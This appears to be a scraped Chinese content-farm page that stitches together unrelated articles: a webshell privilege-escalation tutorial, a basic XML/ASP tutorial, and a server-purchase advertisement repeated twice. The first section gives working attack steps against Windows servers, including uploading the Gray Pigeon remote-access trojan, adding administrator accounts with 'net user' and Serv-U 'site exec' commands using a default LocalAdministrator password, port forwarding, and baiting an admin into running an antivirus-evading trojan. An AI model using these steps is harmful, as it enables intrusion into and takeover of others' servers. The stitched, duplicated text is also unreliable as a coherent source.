<acronym id="600qs"></acronym>
<acronym id="600qs"><center id="600qs"></center></acronym>

61閱讀

服務器教程-webshell 提權方法 服務器提權教程

發布時間:2018-05-12 所屬欄目:編程

一 : webshell 提權方法 服務器提權教程

一:首先檢測一下網站的服務器是否開了 3389
遠程終端
二:檢測一下服務是否用了serv-u (還有是什么版本的)
方法
一:復制一個網站 用 3389 登陸器連接一下 (是否成功)
能連接了,拿下服務器的機率,提高 30%了
二:用ftp模式查下一個服務器的版本
開始 -- 運行 -- cmd -- ftp (加你要登陸的網站)
---------------------------------------------------------------------------------------
第一步:最簡單的方法

看有沒有權限,能不能執行命令,行的話直接傳個鴿子運行(成功率非常低)
----------------------------------------------------------------------------------------
第二步::尋找有執行的權限目錄
c:winntsystem32inetsrvdata
c:Documents and SettingsAll Users
c:Program Filesserv-u
C:Program FilesMicrosoft SQL Server
這樣的目錄可以直接上傳鴿子,運行
-----------------------------------------------------------------------------------
第三步:傳個cmd和開帳號的ftp.exe上去直接加帳號
命令就是你上傳目錄D:VMware Workstationcmd.exe "net user xiao xiao
/add"
-----------------------------------------------------------------------------------
第四步:asp提權木馬直接提權
serv-u 6.3 版本 好象用asp提權木馬(不成功)
serv-u 6.2 版本 好象可以
不過提權能不能用asp木馬還要看服務器,設置的變態不
假設直接用asp提權成功之后,還是不成功,但是可以在
cmd之下 用這個帳號連接一下
ftp (加你提權的網站)
帳號:LocalAdministrator 密碼:$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號了
命令:quote site exec (你添加的帳號) net user 123 123 /ad
quote site exec (把帳號提升到最高權限) net localgroup administartors
123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:Documents and SettingsAll UsersApplication
DataSymantecpcAnywhere
這里下他的GIF文件,在本地安裝pcanywhere上去
網上很多教程
---------------------------------------------------------------------------------------
第六步:serv-u覆蓋提權
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini
網上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U轉發端口
給Latte加鹽 曾經做個一個(serv-u經典提權全套教程)用到過這個方法,可以學習一下
上傳個端口轉發工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務器,
IP填對方IP,帳號為LocalAdministrator
密碼為$ak#.1k;0@p">#1@$ak#.1k;0@p,
連接上后你就可以管理他的Serv-u了
--------------------------------------------------------------------------------------------
第八步:社會工程學之提升提權
把灰鴿子傳到上面,然后轉移到c盤,就等著管理員運行了,前提你的鴿子必須免殺
要是讓我看到一個不清楚的exe程序,老想點開看看,呵呵(估計沒有那個SB會點吧)

二 : XML入門教程:服務器上的XML

XML可以在不安裝任何XML控件的情況下在服務器端生成。

在服務器上存儲XML

XML文件可被存儲在服務器上,和HTML文件的存儲方式是完全相同的。

啟動Windows記事本,并編寫以下代碼行:

以下為引用的內容:
<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
  <from>Jani</from>
  <to>Tove</to>
  <message>Remember me this weekend</message>
</note>

然后把這個文件命名為"note.xml"并保存在您的服務器。

通過ASP生成XML

XML可在不安裝任何XML軟件的情況下在服務器端生成。

如需從服務器生成XML響應 - 只需簡單地編寫以下代碼并在服務器上把它保存為一個ASP文件:

以下為引用的內容:
<%
response.ContentType="text/xml"
response.Write("<?xml version='1.0' encoding='ISO-8859-1'?>")
response.Write("<note>")
response.Write("<from>Jani</from>")
response.Write("<to>Tove</to>")
response.Write("<message>Remember me this weekend</message>")
response.Write("</note>")
%>

請注意,此響應的內容類型必須設置為"text/xml"。

如果您還不懂如何編寫ASP,請訪問我們的《ASP教程》。

從數據庫獲取XML

XML可在不安裝任何XML軟件的情況下從數據庫生成。

如需從服務器生成XML數據庫響應,只需簡單地編寫以下代碼,并把它在服務器上保存為ASP文件:

以下為引用的內容:
<%
response.ContentType = "text/xml"
set conn=Server.CreateObject("ADODB.Connection")
conn.provider="Microsoft.Jet.OLEDB.4.0;"
conn.open server.mappath("/db/database.mdb")
sql="select fname,lname from tblGuestBook"
set rs=Conn.Execute(sql)
rs.MoveFirst()
response.write("<?xml version='1.0' encoding='ISO-8859-1'?>")
response.write("<guestbook>")
while (not rs.EOF)
  response.write("<guest>")
  response.write("<fname>" & rs("fname") & "</fname>")
  response.write("<lname>" & rs("lname") & "</lname>")
  response.write("</guest>")
  rs.MoveNext()
wend
rs.close()
conn.close()
response.write("</guestbook>")
%>

上面的例子使用了帶有ADO的ASP。如果您不懂如何使用ADO,請訪問我們的《ADO教程》。

三 : RAKsmart美國特價服務器購買教程

  企業怎么做品牌推廣 好推寶助力品牌提升知名度

  RAKsmart美國機房位于加州地區,距離中國大陸近,而且機房直連聯通電信等線路,國內訪問速度非???,成為站長免備案建站的最佳選擇之一。RAKsmart機房還有一個特色就是每周會推出幾款美國特價服務器,優惠力度高達50%,可以讓有需求的用戶節約不少成本。那么RAKsmart美國特價服務器怎樣購買呢?小編這里分享一下詳細的購買圖文教程,希望對大家有所幫助。

  1. 訪問RAKsmart中文官網(http://cn.raksmart.com),在首頁導航的產品中心選擇“每周特價”;

  

 

  2. 特價頁面顯示的就是每周的特價產品,包括獨立服務器、VPS等,這里我們選擇獨立服務器來演示,選擇滿足需求的專用服務器,直接點擊“訂購”;

  

 

  溫馨提示:有些特價服務器是直接下單即可享受優惠,而有些是需要輸入優惠碼才可以,請大家下單時看清楚。

  3. 進入服務器配置頁面,可以選擇額外配置資源,填寫需要的信息,然后點擊“結算”按鈕;

  

 

  4. 產品核對與結算:

  a. 產品審核,確保信息和價格沒有問題;

  

 

  b. 用戶登錄,如果是老客戶直接登錄即可,新用戶需要填寫注冊信息;

  

 

  c. 如果需要使用優惠碼才能享受優惠的需要填寫優惠碼并激活,再選擇支付方式(支付寶或Paypal),以及填寫想備注的信息。

  

 

  5. 信息確認無誤后,點擊底部的“完成訂單”按鈕跳轉到支付頁面,支付即可。

  

 

  完成以上RAKsmart美國特價服務器購買流程后,注冊郵箱會收到服務器的相關信息,就可以管理自己的服務器了。RAKsmart支持24小時中文技術支持,如果有任何問題也可以直接咨詢他們。

四 : RAKsmart美國特價服務器購買教程

  A5創業項目春季招商 好項目招代理無憂

  RAKsmart美國機房位于加州地區,距離中國大陸近,而且機房直連聯通電信等線路,國內訪問速度非???,成為站長免備案建站的最佳選擇之一。RAKsmart機房還有一個特色就是每周會推出幾款美國特價服務器,優惠力度高達50%,可以讓有需求的用戶節約不少成本。那么RAKsmart美國特價服務器怎樣購買呢?小編這里分享一下詳細的購買圖文教程,希望對大家有所幫助。

  1. 訪問RAKsmart中文官網(http://cn.raksmart.com),在首頁導航的產品中心選擇“每周特價”;

  

 

  2. 特價頁面顯示的就是每周的特價產品,包括獨立服務器、VPS等,這里我們選擇獨立服務器來演示,選擇滿足需求的專用服務器,直接點擊“訂購”;

  

 

  溫馨提示:有些特價服務器是直接下單即可享受優惠,而有些是需要輸入優惠碼才可以,請大家下單時看清楚。

  3. 進入服務器配置頁面,可以選擇額外配置資源,填寫需要的信息,然后點擊“結算”按鈕;

  

 

  4. 產品核對與結算:

  a. 產品審核,確保信息和價格沒有問題;

  

 

  b. 用戶登錄,如果是老客戶直接登錄即可,新用戶需要填寫注冊信息;

  

 

  c. 如果需要使用優惠碼才能享受優惠的需要填寫優惠碼并激活,再選擇支付方式(支付寶或Paypal),以及填寫想備注的信息。

  

 

  5. 信息確認無誤后,點擊底部的“完成訂單”按鈕跳轉到支付頁面,支付即可。

  

 

  完成以上RAKsmart美國特價服務器購買流程后,注冊郵箱會收到服務器的相關信息,就可以管理自己的服務器了。RAKsmart支持24小時中文技術支持,如果有任何問題也可以直接咨詢他們。

本文標題:服務器教程-webshell 提權方法 服務器提權教程
本文地址: http://www.guiliuhe.cn/1181470.html

61閱讀| 精彩專題| 最新文章| 熱門文章| 蘇ICP備13036349號-1

福利三分彩